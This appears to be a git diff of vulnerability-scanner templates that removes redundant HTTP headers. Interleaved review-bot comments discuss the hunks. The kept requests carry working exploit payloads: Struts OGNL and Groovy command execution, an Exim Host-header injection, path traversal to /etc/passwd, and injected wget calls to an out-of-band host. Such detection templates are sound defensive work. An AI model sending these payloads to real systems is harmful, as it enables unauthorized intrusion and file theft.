- cves/2021/CVE-2021-21985.yaml | 2 - cves/2021/CVE-2021-22214.yaml | 2 - cves/2021/CVE-2021-24285.yaml | 1 - cves/2021/CVE-2021-25281.yaml | 6 --- cves/2021/CVE-2021-25646.yaml | 3 -- cves/2021/CVE-2021-26295.yaml | 42 +++++++++---------- cves/2021/CVE-2021-27850.yaml | 9 +--- cves/2021/CVE-2021-28150.yaml | 17 +------- cves/2021/CVE-2021-28151.yaml | 22 +--------- cves/2021/CVE-2021-29203.yaml | 6 --- cves/2021/CVE-2021-30461.yaml | 4 -- cves/2021/CVE-2021-3129.yaml | 18 -------- cves/2021/CVE-2021-31755.yaml | 8 +--- cves/2021/CVE-2021-32030.yaml | 1 - cves/2021/CVE-2021-3297.yaml | 4 -- cves/2021/CVE-2021-33544.yaml | 3 -- cves/2021/CVE-2021-34429.yaml | 2 - cves/2021/CVE-2021-34621.yaml | 6 --- cves/2021/CVE-2021-35336.yaml | 4 +- default-logins/abb/cs141-default-login.yaml | 12 ------ .../aem/adobe-aem-default-credentials.yaml | 6 --- 
.../apache/airflow-default-credentials.yaml | 9 ---- .../apache-superset-default-credentials.yaml | 9 ---- .../dell/dell-idrac-default-login.yaml | 9 ++-- .../dell/dell-idrac9-default-login.yaml | 6 --- .../flir/flir-ax8-default-credentials.yaml | 5 --- default-logins/gitlab/gitlab-weak-login.yaml | 3 -- .../glpi/glpi-default-credential.yaml | 14 ------- .../grafana/grafana-default-credential.yaml | 5 --- .../hongdian/hongdian-default-password.yaml | 10 ----- .../ibm/ibm-storage-default-credential.yaml | 4 +- .../iptime/iptime-default-login.yaml | 4 +- .../nexus/nexus-default-password.yaml | 2 - .../oracle/oracle-bi-default-credentials.yaml | 6 +-- .../panabit/panabit-default-password.yaml | 3 -- .../rockmongo-default-credentials.yaml | 1 - .../spectracom-default-credential.yaml | 3 -- .../trilithic-viewpoint-default.yaml | 1 - .../wso2/wso2-default-password.yaml | 4 +- .../xxljob/xxljob-default-login.yaml | 1 - exposed-panels/acunetix-panel.yaml | 3 +- exposed-panels/atlassian-crowd-panel.yaml | 3 +- exposed-panels/checkmarx-panel.yaml | 3 +- exposed-panels/citrix-adc-gateway-detect.yaml | 4 +- exposed-panels/couchdb-exposure.yaml | 5 +-- exposed-panels/nessus-panel.yaml | 5 ++- .../prometheus-exporter-detect.yaml | 4 +- exposed-panels/solarwinds-orion.yaml | 3 +- .../configs/ruijie-eg-password-leak.yaml | 2 - .../ruijie-nbr1300g-cli-password-leak.yaml | 1 - .../logs/oracle-ebs-sqllog-disclosure.yaml | 2 - fuzzing/iis-shortname.yaml | 12 ------ fuzzing/xff-403-bypass.yaml | 12 ------ iot/targa-camera-ssrf.yaml | 4 -- misconfiguration/aem/aem-crx-bypass.yaml | 4 -- .../aem/aem-hash-querybuilder.yaml | 4 -- .../aem/aem-jcr-querybuilder.yaml | 4 -- misconfiguration/aspx-debug-mode.yaml | 2 - misconfiguration/cloudflare-image-ssrf.yaml | 3 -- .../iis-internal-ip-disclosure.yaml | 1 - .../ssrf-via-oauth-misconfig.yaml | 2 - technologies/clockwork-php-page.yaml | 3 +- technologies/dell/dell-idrac6-detect.yaml | 2 - technologies/dell/dell-idrac7-detect.yaml | 2 - 
technologies/dell/dell-idrac8-detect.yaml | 2 - technologies/dell/dell-idrac9-detect.yaml | 3 -- technologies/kibana-detect.yaml | 3 +- technologies/liferay-portal-detect.yaml | 3 +- technologies/pega-detect.yaml | 3 +- technologies/prometheus-exposed-panel.yaml | 3 +- .../apache/apache-flink-unauth-rce.yaml | 6 +-- .../jenkins/jenkins-stack-trace.yaml | 6 +-- .../jolokia/jolokia-heap-info-disclosure.yaml | 8 +--- .../oscommerce/oscommerce-rce.yaml | 7 ---- .../other/bullwark-momentum-lfi.yaml | 1 - .../other/core-chuangtian-cloud-rce.yaml | 5 --- vulnerabilities/other/couchdb-adminparty.yaml | 3 +- vulnerabilities/other/eyou-email-rce.yaml | 4 -- .../other/geovision-geowebserver-xss.yaml | 1 - vulnerabilities/other/gloo-unauth.yaml | 1 - .../other/hashicorp-consul-rce.yaml | 6 +-- .../other/hasura-graphql-ssrf.yaml | 7 +--- vulnerabilities/other/hiboss-rce.yaml | 5 --- .../other/hjtcloud-arbitrary-file-read.yaml | 4 -- .../other/huawei-router-auth-bypass.yaml | 5 --- vulnerabilities/other/jeewms-lfi.yaml | 2 - .../other/jfrog-unauth-build-exposed.yaml | 2 - .../other/kevinlab-bems-backdoor.yaml | 4 -- vulnerabilities/other/kevinlab-bems-sqli.yaml | 4 -- vulnerabilities/other/keycloak-xss.yaml | 3 -- .../other/landray-oa-fileread.yaml | 8 ---- .../other/maian-cart-preauth-rce.yaml | 10 ----- .../other/mida-eframework-xss.yaml | 2 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 - .../other/netgear-router-auth-bypass.yaml | 9 +--- .../other/netgear-wnap320-rce.yaml | 3 -- .../other/oa-tongda-path-traversal.yaml | 2 - vulnerabilities/other/oa-v9-uploads-file.yaml | 6 --- .../other/optilink-ont1gew-gpon-rce.yaml | 12 ++---- .../other/php-zerodium-backdoor-rce.yaml | 2 + .../other/powercreator-cms-rce.yaml | 4 -- ...-netkang-next-generation-firewall-rce.yaml | 4 +- .../other/rce-shellshock-user-agent.yaml | 6 ++- vulnerabilities/other/rconfig-rce.yaml | 15 +++---- vulnerabilities/other/ruijie-eg-rce.yaml | 5 --- .../other/ruijie-networks-rce.yaml | 4 -- 
vulnerabilities/other/sar2html-rce.yaml | 6 +-- .../other/showdoc-file-upload-rce.yaml | 3 -- .../other/simple-employee-rce.yaml | 10 +---- .../other/sonicwall-sslvpn-shellshock.yaml | 2 - vulnerabilities/other/vpms-auth-bypass.yaml | 6 +-- vulnerabilities/other/yapi-rce.yaml | 18 -------- .../other/zimbra-preauth-ssrf.yaml | 3 -- vulnerabilities/other/zms-auth-bypass.yaml | 10 ++--- .../rocketchat/unauth-message-read.yaml | 8 ---- .../wordpress-infinitewp-auth-bypass.yaml | 9 ---- .../wordpress-rce-simplefilelist.yaml | 7 ---- .../wordpress/wordpress-zebra-form-xss.yaml | 8 +--- .../wordpress/wp-multiple-theme-ssrf.yaml | 4 -- 198 files changed, 138 insertions(+), 1011 deletions(-) diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/CNVD-2020-68596.yaml index 9f1c78f053..56cd6901fd 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -12,24 +12,17 @@ requests: - | POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 5 Content-Type: application/x-www-form-urlencoded - Accept-Encoding: deflate "1":1 - | GET /public/index.php/home/file/user_pics HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - Accept-Encoding: deflate + - | GET {{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: deflate extractors: - type: regex diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/CNVD-2021-15822.yaml index b41d42c850..83e4dc3d9d 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/CNVD-2021-15822.yaml 
@@ -12,7 +12,6 @@ requests: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml index c6a28b6fb0..41c508efc2 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -14,7 +14,6 @@ requests: - | #linux POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); @@ -22,7 +21,6 @@ requests: - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("ipconfig"); diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 2837b0aa42..36ff315c20 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -17,11 +17,7 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index c6730730c0..0a1111e02c 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml 
@@ -16,9 +16,7 @@ requests: - | POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - Content-Length: 31 diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index 68a2b11bcd..a2bd566a60 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -18,10 +18,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "size": 1, diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 40dd85cb6b..79427e3ba5 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "name": "test" @@ -29,11 +26,7 @@ requests: POST /_search HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 4f7d3d42da..479d0f70f3 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml 
@@ -12,18 +12,12 @@ requests: - |+ GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - |+ POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Connection: close - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Accept: */* - Content-Length: 56 Content-Type: application/x-www-form-urlencoded wp-submit=Get+New+Password&redirect_to=&user_login={{username}} diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 05119f088c..26b9577ef4 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -16,7 +16,6 @@ requests: - | GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - Content-Length: 4 matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 41d8c711b1..16dc0d9801 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml 
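Review bot: The second request's `Host:` line is the Exim command-injection payload rather than a hostname, and the command it spells out with `${substr…}` (a `touch` of `/tmp/success` on the target) produces nothing observable in the HTTP reply, so whatever the matchers (outside this hunk) check cannot confirm execution. A comment above the request would keep the next reader from assuming otherwise, e.g. `# Blind check: the injected command only touches /tmp/success on the target; nothing in the response proves it ran`. Note also that `{{username}}` is presumably filled by an extractor on the first `/?author=1` request (outside the hunk); if it extracts nothing, the POST goes out with an empty `user_login`.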
@@ -17,10 +17,7 @@ requests: - | POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host: {{Hostname}} - Connection: close - Content-Length: 160 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 2782404f8a..26de578c10 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: text/xml - Content-Length: 5178 diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 88173e6fbf..5565f23393 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -13,11 +13,7 @@ requests: - | PUT /_users/org.couchdb.user:poc HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 108 { "type": "user", diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 87579df08b..9772411357 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml 
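Review bot: `PUT /_users/org.couchdb.user:poc` creates a user document with a fixed name, so a second run against the same host gets a 409 conflict instead of the response the matchers (outside this hunk) look for, and the document created by the first run stays behind on the target. Using `org.couchdb.user:{{randstr}}` in the request line, with the matching `name` field in the body (cut off at the hunk boundary), avoids the collision; the persistence itself deserves a sentence in `info` so operators know this check writes an account to the target.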
@@ -16,35 +16,28 @@ requests: - | POST /maint/index.php?packages HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/maint/index.php?packages - Content-Length: 160 Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: {{Hostname}}/maint/index.php?packages Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 0677931936..2de5b8d83a 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -13,10 +13,7 @@ requests: - | POST / HTTP/1.1 Host: {{Hostname}} - Content-Length: 264 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ - Accept-Encoding: gzip, deflate - Connection: close ------WebKitFormBoundaryKc8fBVDo558U4hbJ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" 
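Review bot: Both `Cookie:` lines still carry fixed `PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2` values copied from the original capture, which mean nothing on any other host and are exactly the kind of artifact this commit removes elsewhere; `Cookie: lng=en` is the most that could plausibly matter. `Referer: {{Hostname}}/maint/index.php?packages` also lacks a scheme, whereas the CVE-2019-15107 and CVE-2019-16920 hunks in this same commit standardise on `{{BaseURL}}`, so `Referer: {{BaseURL}}/maint/index.php?packages` would be consistent. Finally, `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=` decodes to `maint:password`, i.e. the check only fires while the default maintenance credentials are still set; that precondition should be stated in `info` (outside the hunk).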
@@ -34,9 +31,6 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip,deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close req-condition: true matchers: diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 136b15b2b5..ab048ea172 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -14,11 +14,9 @@ info: requests: - raw: - | - GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 + GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: */* - Connection: close payloads: endpoint: diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 954ace9e22..5ccba81a04 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -16,10 +16,8 @@ requests: POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml - User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 - Content-Length: 873 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index e09313bde2..ad22c9704a 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -13,11 +13,7 @@ requests: GET / HTTP/1.1 Host: {{Hostname}} Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 - Accept-Language: en Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data - Connection: Keep-Alive - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) - Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* matchers: 
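Review bot: The kept header block of the CVE-2017-3506 request sends `Content-Type` twice (`text/xml` and `text/xml;charset=UTF-8`) and the `Accept:` value ends in a stray comma (`*/*;q=0.8,`), both leftovers of the same capture the removed `User-Agent` line (which also ended in a comma) came from. Drop the first `Content-Type: text/xml` and the trailing comma so the request carries one well-formed content type; duplicate `Content-Type` headers are handled inconsistently by servers and intermediaries. The SOAP body and matchers lie outside the hunk.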
diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0d45c0ac48..30ca442da3 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -17,10 +17,6 @@ requests: GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 matchers: - type: word diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 257292c0b8..c2ae610bf1 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -13,12 +13,8 @@ requests: - | GET /__ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest - Connection: close Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini matchers-condition: and diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 583039f7e5..0a1de31159 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml 
@@ -18,78 +18,42 @@ requests: - | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 - 
Connection: close - Content-Length: 17 - Accept: */* - Accept-Language: en Content-Type: text/html - Accept-Encoding: gzip, deflate diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml index e00ef15315..961e31302a 100644 --- a/cves/2018/CVE-2018-1000130.yaml +++ b/cves/2018/CVE-2018-1000130.yaml @@ -12,21 +12,15 @@ requests: - | POST /jolokia/read/getDiagnosticOptions HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 167 { - "type" : "read", - "mbean" : "java.lang:type=Memory", - "target" : { - "url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" - } + "type":"read", + "mbean":"java.lang:type=Memory", + "target":{ + "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat" + } } matchers-condition: and @@ -35,6 +29,7 @@ requests: words: - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389" part: body + - type: status status: - 200 diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml index d2feac4619..4591ccbbf3 100644 --- a/cves/2018/CVE-2018-1000533.yaml +++ b/cves/2018/CVE-2018-1000533.yaml @@ -17,8 +17,6 @@ requests: - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 45 Content-Type: application/x-www-form-urlencoded query=--open-files-in-pager=cat%20/etc/passwd diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml index 6001320f0c..0c21319c5d 100644 --- a/cves/2018/CVE-2018-10141.yaml +++ b/cves/2018/CVE-2018-10141.yaml 
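Review bot: After this cleanup the six raw requests differ only in the path prefix before `/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`, so each is three lines of identical boilerplate; a `payloads:` list with `GET /{{prefix}}vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1`, as the CVE-2017-17562 and CVE-2018-1000533 hunks in this commit already do with `{{endpoint}}` and `{{path}}`, would collapse them into one request. Each request also keeps `Content-Type: text/html` on a GET, which only makes sense if a PHP body is sent with it; that body, if any, is not visible in the hunk, so I cannot tell whether the header is still needed.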
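Review bot: The kept `Accept:` line of the CVE-2018-1000130 request ends in a truncated quality value, `image/webp,*/*;q=0.`, which is a malformed header (the capture it came from presumably read `q=0.8`); since this commit is stripping capture artifacts, either drop the `Accept` line or replace it with `Accept: */*`. The request also labels a JSON body as `Content-Type: application/x-www-form-urlencoded`; as far as I can tell Jolokia parses the POST body as JSON regardless, but `application/json` is the accurate value.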
@@ -12,8 +12,6 @@ requests: - method: GET path: - '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index c775728787..f134dc0cba 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -15,8 +15,6 @@ requests: - | POST /system/sharedir.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &uid=10; wget http://{{interactsh-url}} @@ -24,8 +22,6 @@ requests: - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/7.58.0 - Accept: */* Content-Type: application/x-www-form-urlencoded &act=sync&task_number=1;wget http://{{interactsh-url}} diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index 